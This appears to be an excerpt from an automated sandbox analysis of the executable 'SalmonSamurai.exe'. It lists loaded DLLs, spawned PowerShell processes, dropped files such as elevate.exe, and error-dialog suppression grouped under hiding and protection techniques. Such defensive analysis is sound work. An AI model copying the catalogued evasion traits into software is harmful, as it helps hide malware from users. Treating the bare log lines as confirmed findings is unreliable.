Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: windows.ui.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: windowmanagementapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: inputhost.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: mscms.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: coloradapterclient.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: mmdevapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: devobj.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: symsrv.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: mf.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: mfplat.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: rtworkq.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: msmpeg2vdec.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: mfperfhelper.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dxva2.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: msvproc.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\SalmonSamurai.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: SalmonSamurai.exe Static PE information: certificate valid
Source: SalmonSamurai.exe Static file information: File size 74023200 > 1048576
Source: SalmonSamurai.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: ws\dll\System.Core.pdb source: powershell.exe, 00000013.00000002.1697930434.000001E0D2635000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Formatters.Soape.pdb source: powershell.exe, 00000013.00000002.1692185598.000001E0D233E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000013.00000002.1692185598.000001E0D230C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb&0$ source: powershell.exe, 00000013.00000002.1692185598.000001E0D233E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ft.Automation.pdbK source: powershell.exe, 00000011.00000002.1738372742.000001AAEA38D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: n.pdb source: powershell.exe, 00000013.00000002.1692185598.000001E0D230C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbV source: powershell.exe, 00000013.00000002.1697930434.000001E0D2635000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dllon.pdbJ source: powershell.exe, 00000013.00000002.1697930434.000001E0D2635000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000013.00000002.1697930434.000001E0D2620000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb37-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000013.00000002.1590406499.000001E0B82EA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000013.00000002.1697930434.000001E0D2620000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Runtime.Serialization.Formatters.Soapon.pdb+ source: powershell.exe, 00000013.00000002.1692185598.000001E0D233E000.00000004.00000020.00020000.00000000.sdmp
Source: libGLESv2.dll.0.dr Static PE information: section name: .00cfg
Source: libGLESv2.dll.0.dr Static PE information: section name: .gxfg
Source: libGLESv2.dll.0.dr Static PE information: section name: .retplne
Source: libGLESv2.dll.0.dr Static PE information: section name: _RDATA
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .00cfg
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .gxfg
Source: vk_swiftshader.dll.0.dr Static PE information: section name: .retplne
Source: vk_swiftshader.dll.0.dr Static PE information: section name: _RDATA
Source: vulkan-1.dll.0.dr Static PE information: section name: .00cfg
Source: vulkan-1.dll.0.dr Static PE information: section name: .gxfg
Source: vulkan-1.dll.0.dr Static PE information: section name: .retplne
Source: vulkan-1.dll.0.dr Static PE information: section name: _RDATA
Source: SalmonSamurai.exe.0.dr Static PE information: section name: .00cfg
Source: SalmonSamurai.exe.0.dr Static PE information: section name: .gxfg
Source: SalmonSamurai.exe.0.dr Static PE information: section name: .retplne
Source: SalmonSamurai.exe.0.dr Static PE information: section name: .rodata
Source: SalmonSamurai.exe.0.dr Static PE information: section name: CPADinfo
Source: SalmonSamurai.exe.0.dr Static PE information: section name: LZMADEC
Source: SalmonSamurai.exe.0.dr Static PE information: section name: _RDATA
Source: SalmonSamurai.exe.0.dr Static PE information: section name: malloc_h
Source: ffmpeg.dll.0.dr Static PE information: section name: .00cfg
Source: ffmpeg.dll.0.dr Static PE information: section name: .gxfg
Source: ffmpeg.dll.0.dr Static PE information: section name: .retplne
Source: ffmpeg.dll.0.dr Static PE information: section name: _RDATA
Source: libEGL.dll.0.dr Static PE information: section name: .00cfg
Source: libEGL.dll.0.dr Static PE information: section name: .gxfg
Source: libEGL.dll.0.dr Static PE information: section name: .retplne
Source: libEGL.dll.0.dr Static PE information: section name: _RDATA
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\ffmpeg.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\SalmonSamurai.exeFile created: C:\Users\user\AppData\Roaming\NsisExtracted\LICENSE.electron.txtJump to behavior

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\SalmonSamurai.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
